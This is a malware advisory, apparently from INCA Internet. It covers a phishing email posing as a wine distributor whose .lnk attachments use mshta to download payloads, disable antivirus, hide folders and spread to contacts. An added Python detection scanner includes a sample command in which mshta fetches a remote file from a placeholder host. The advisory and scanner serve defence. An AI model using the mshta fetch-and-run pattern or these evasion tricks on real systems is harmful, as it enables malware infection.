INCA Internet's response team detected a malicious e-mail disguised as having been sent by a premium wine and spirits distributor. The sender field carries the real name and mail address of a person at the company's Denmark branch. Its main feature is that it uses link (.lnk) files for infection. Once the system is infected, the malware forcibly terminates certain anti-virus programs and displays the main screen of a messenger client such as MSN. The files are written in Spanish, and the malware has not been found in Korea so far.
As malicious files of this kind spread more widely, users need to be careful when using the Internet and stay safe from malicious e-mails.
2. Spreading cases and symptoms of infection
This malicious file is disguised as having been sent by a wine company and induces the user to download it. Once the system is infected, the malware collects the victim's mail contacts and tries to send the same mail to the collected addresses.
The sender's address appears to belong to the Denmark branch, so users can easily be deceived. The following image shows the real "Jacob Hertz".
The malicious functions are as follows.
Two .lnk files are found after extracting the attachment.
Their icons are made to look like a help file and a messenger. When run, both download an additional malicious file using "mshta.exe", the Microsoft HTML Application host that ships with Windows. The following figure shows the commands.
When the additional malicious file (msnmsgr.tpl) is executed by a certain command, it downloads various script files and further malicious files.
The downloaded malicious scripts download other malicious files that present themselves as MSN Messenger (Spanish version).
Besides, it changes the browser start page, disables Task Manager, enables Remote Desktop and sets a shell script command.
Using a certain command, it kills anti-virus software (Avira) and browsers. It tries to reach a certain external server, from which it can download additional malicious files and act as a bot under commands from the remote server.
Upon infection it sets the attribute of every folder to hidden and creates link files in their place.
These new link files look the same as the original folders, so users are likely to click them.
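The two link-file tricks described above (a .lnk that shadows a hidden folder of the same name, and a .lnk whose stored command line runs mshta.exe) can be checked for with a small scanner. The following is an added example written for this page, not INCA's own tooling; the folder name, the link names and the example.invalid URL are constructed sample data, and the mshta check is a byte-level heuristic rather than a full LNK parser.

```python
import tempfile
from pathlib import Path

# ShellLinkHeader: HeaderSize 0x4C then LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
# LNK string data (target, arguments) is usually UTF-16LE; check ASCII as well.
MSHTA_NEEDLES = (b"mshta", "mshta".encode("utf-16-le"))

def is_shell_link(path: Path) -> bool:
    """True when the file starts with a genuine ShellLinkHeader, not just .lnk."""
    with path.open("rb") as fh:
        return fh.read(len(LNK_HEADER)) == LNK_HEADER

def invokes_mshta(path: Path) -> bool:
    """Heuristic: does the link's stored target or arguments mention mshta?"""
    data = path.read_bytes().lower()   # bytes.lower() touches ASCII only
    return any(needle in data for needle in MSHTA_NEEDLES)

def scan(root: Path) -> list[dict]:
    """Report .lnk files that shadow a same-named folder and/or invoke mshta."""
    findings = []
    for lnk in sorted(root.rglob("*.lnk")):
        if not is_shell_link(lnk):
            continue                   # wrong header: not a real shell link
        folder = lnk.with_suffix("")   # "Documents.lnk" -> sibling "Documents"
        shadows, mshta = folder.is_dir(), invokes_mshta(lnk)
        if shadows or mshta:
            findings.append({"lnk": lnk.name, "shadows_folder": shadows,
                             "invokes_mshta": mshta})
    return findings

def demo() -> list[dict]:
    """Scan a constructed sample layout (placeholder URL, not a real IoC)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Documents").mkdir()   # the real folder the malware would hide
        args = "mshta.exe http://example.invalid/msnmsgr.tpl".encode("utf-16-le")
        (root / "Documents.lnk").write_bytes(LNK_HEADER + b"\0" * 60 + args)
        # Benign link: valid header, ordinary target, no folder of that name.
        (root / "Readme.lnk").write_bytes(LNK_HEADER + b"\0" * 60 + b"notepad.exe")
        (root / "notes.lnk").write_bytes(b"plain text, not a shell link")
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

On Windows the hidden attribute of the shadowed folder can additionally be read from `Path.stat().st_file_attributes`; the scan above flags the folder/link name collision regardless of that attribute.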
The following malicious behaviour can also occur.
3. How to prevent
Spreading malicious files by e-mail is a very traditional method, yet many users still open the attachments and become infected. To keep your PC safe from the threats posed by these malicious attachments, we recommend downloading the latest security updates and following the "Security management tips" for general users below.
INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.